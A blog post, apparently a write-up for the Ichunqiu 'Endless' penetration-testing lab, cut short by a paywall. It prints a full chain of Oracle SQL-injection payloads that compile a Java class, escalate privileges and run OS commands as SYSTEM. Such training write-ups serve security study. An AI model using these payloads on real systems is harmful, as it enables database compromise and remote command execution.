【原创】Ichunqiu云境 —— Endless(无间计划) Writeup

最新推荐文章于 2023-12-30 17:12:57 发布
最新推荐文章于 2023-12-30 17:12:57 发布
阅读量839 收藏 2
点赞数
分类专栏: 内网渗透 web渗透 文章标签: 网络 web安全 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WUfagg/article/details/129684384
版权

Ichunqiu云境 —— Endless(无间计划) Writeup

Author:小离-xiaoli

0x00 Intro

前言:

  • 两个入口点,一个入口点是pboot-cms,另外一个是SQL注入
  • 这边入口外网IP可能会有不一致得地方,因为靶场重启次数比较多,IP经常变化
  • OSCP风格,不使用CS/MSF
  • 这个靶场共有12个Flag

0x01 Recon

扫描结果:

  1. 入口点1 - SQL注入 (Linux):
    在这里插入图片描述

  2. 入口点2 - Pboot-CMS (Linux):
    在这里插入图片描述


0x02 入口点1 - SQL注入 (Linux)

前言:

  • 一个站库分离的oracle注入,web是linux,注入点可以通过oracle注入发现到是一个windows,权限非dba,只有java runtime permission,这里没截图
  • 这里前几次都没打成功,卡了挺久,后面搭建了个oracle和九世一起测试的
  • 不建议用SqlMap,会把站打挂,并且可以看源码发现sqlmap提权函数没有定义关于oracle数据库的攻击方法
  • Oracle 版本 Oracle Database 11g Enterprise Edition Release 11.2.0.1.0

  1. 直接上payload
1. 创建JAVA Source
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --

2.提权
admin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--

3.创建函数
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--

4.查询创建的函数
admin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--

5.查询java source
admin' union select null,(select object_name from all_objects where object_name ='LinxUtil'),null from dual--

6.命令执行
admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--

  1. 函数LINXRUNCMD创建成功
    在这里插入图片描述

  2. whoami,直接是system权限了
    在这里插入图片描述

  3. ipconfig,该数据库内网IP为 172.23.4.51,此时需要回到入口点2进入内网了
    在这里插入图片描述


## 0x0
最低0.47元/天 解锁文章
Gcow安全团队
关注
专栏目录
Fscan 二开记录
WUfagg的博客
12-15 663
Author:Xiaoli-小离0x01 Intro•由于不搞红队了,最近一身轻松,于是就萌生了改Fscan的想法•本章节是我第一个闭源项目(fscan,懂的都懂,你改一个,别人杀软盯一个),可能辜负了想要代码的同学•感谢: 狗恩,@jiushi,@9bie的协助0x02 改进点•1,删除一些少用的功能,例如:wmiexec,SSH命令执行,MS17 EXP,http/socks5 pro...
ichunqiu云境 - Delegation Writeup
WUfagg的博客
12-10 907
一场内网渗透
春秋云镜-【仿真场景】Unauthorized writeup
渗透测试研究中心
03-07 917
说明Unauthorized是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透第一个flagdocker 未授权通过外网...
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 3919
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
赏金猎人:IChunQiu云境-Spoofing Writeup
WUfagg的博客
01-13 714
一次从内网到域的靶场文件
域渗透-备忘录
qq_50643984的博客
03-01 684
委派获取的权限在于,委派的用户是谁,被委派什么服务,如果是普通域用户,那就获得普通域用户的票据,如果是域管,那就是域管票据,信息收集可以通过Bloodhuond。例如DC01$委派WIN2016$,那么用win2016的账户进行getST就能获取到DC01的票据了。
Endless 主题
12-12
Endless 主题 https://wrapbootstrap.com/theme/endless-responsive-admin-template-WB00J6977 预览地址:http://minetheme.com/Endless1.5.1/index.html
Endless Runner Sample game.unitypackage
08-06
Endless Runner Sameple Game.unitypackage Unity 官方的一个跑酷的例子Demo, 商店太卡的可以在这下
EndlessRunner:使用JavaScript开发的Endless Runner游戏
02-14
无尽的亚军 用JavaScript开发的Endless Runner游戏。 网页 将网络移植到应用程序 使用作为指南。 使用上的示例代码可以实现这一点。 基于以下工作:
DoodleJump类平台跳跃开发工具包Endless2DJumperToolkit
04-22
今天我们要关注的是一个专为开发Doodle Jump风格游戏而设计的工具包——Endless2DJumperToolkit。这款工具包以其易用性和丰富的功能,让开发者能够快速构建无尽的平台跳跃体验,无需从零开始编写复杂的物理和游戏...
春秋云境Exchange WP
最新发布
m0_62466350的博客
12-30 1066
Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。*注意:该靶场只有4个flag,如果提交完4个flag后仍未攻克成功,请关闭环境提交反馈。
安全测试场景下怎样突破内网防御机制
securitypaper的博客
10-01 447
大多数内网存在VLAN跨网段隔离不严、共享服务器管理或访问权 限分配混乱、内部数据或应用系统开放服务或端口较多、内网防火墙 或网关设备固件版本陈旧、终端设备系统补丁更新不及时等问题,导 致内部网络防守比较薄弱,所以蓝队在内网横向拓展中采取的手段会 更加丰富多样。同时,因为内网具有通联性优势,所以内网横向拓展 工作主要围绕通联安全认证的获取与运用开展,主要途径有以下几 种。内网漏洞利用是内网横向拓展最主要的途径。
春秋云境—Initial
龙狼刺的博客
07-15 1944
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2274
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2813
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
春秋云境:CVE-2022-25099
一只爱吃橙子的羊
12-01 1357
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
果粒程
12-08 1618
【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
【春秋云境】CVE-2022-24223复现
小高工作室
12-01 364
命令查看下 python sqlmap.py -r 2.txt -D atomcms -T flag --columns --dump。域名home改成admin试试。有个奇怪的atomcms。
endless 上位机
06-23
### 回答1: Endless 上位机是一个功能强大的软件系统,它主要用于控制各种工业自动化设备。这个系统可以与不同的硬件设备进行通信,从而实现实时监测和控制。 Endless 上位机拥有丰富的可视化界面,用户可以通过图像、图表、动画等方式实时监控工业设备的运行状况。同时,该系统还具有智能报警和故障诊断功能,可以随时提醒用户设备运行中出现的问题,及时采取措施进行修复。 除此之外,Endless 上位机还支持多种通信协议,如RS232、RS485、CAN等,可以与各种常见的工业网络实现无缝连接。此外,该系统还支持多语言界面,可以适应全球化的应用需求。 总之,Endless 上位机是现代化工业制造中重要的控制系统之一,它可以提高工业自动化设备的效率和精度,缩短生产周期,降低维护成本,为企业带来了很大的实际利益和经济效益。 ### 回答2: Endless 上位机是指一种基于 Endless OS 操作系统的计算机,它具有广泛的应用和强大的性能。Endless 上位机的操作系统是基于 Linux 的,可以免费使用,并且拥有庞大的应用程序库,用户可以轻松地获取适合自己的工具。 Endless 上位机拥有相当出色的硬件性能,其内置的处理器和内存都具有高效能,可以轻松应对高强度的任务。同时,它还提供了多种内存容量和处理器型号供用户选择,从而满足不同的用户需求。 Endless 上位机可以用于个人或企业使用,拥有稳定可靠的性能和完善的安全机制。它可以进行多种应用开发,如应用程序开发、游戏开发、数据可视化等,并且可以与其他系统进行连接,实现更广泛的应用场景。 总体而言,Endless 上位机是一种性能强劲、应用广泛、功能多元、易于学习和使用的计算机系统。它能够满足多种场景下的需求,并为用户提供更加便捷、高效、安全和稳定的计算体验。 ### 回答3: Endless 上位机是一种高性能计算设备。它采用了多核处理器、高速存储器、高速网络接口等技术。其主要应用在工业控制、数据处理、模拟仿真、科学计算等领域。 Endless 上位机可以实现多项复杂运算,支持多种操作系统,可以满足用户的不同需求。通过其高效的计算能力和优良的稳定性,可以大大提高应用的效率和准确性。 Endless 上位机还具有丰富的接口和协议支持,可以方便地与其它设备进行数据交换和通信。同时,它还支持多用户环境和远程管理,可以实现多个用户同时对设备进行任务分配、管理和维护。 总之,Endless 上位机是一种高性能、高可靠性的计算设备,具有广泛的应用前景。无论是企业、科研机构还是个人用户,都可以根据自己的需求选择适合自己的 Endless 上位机,以提高工作效率和准确性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值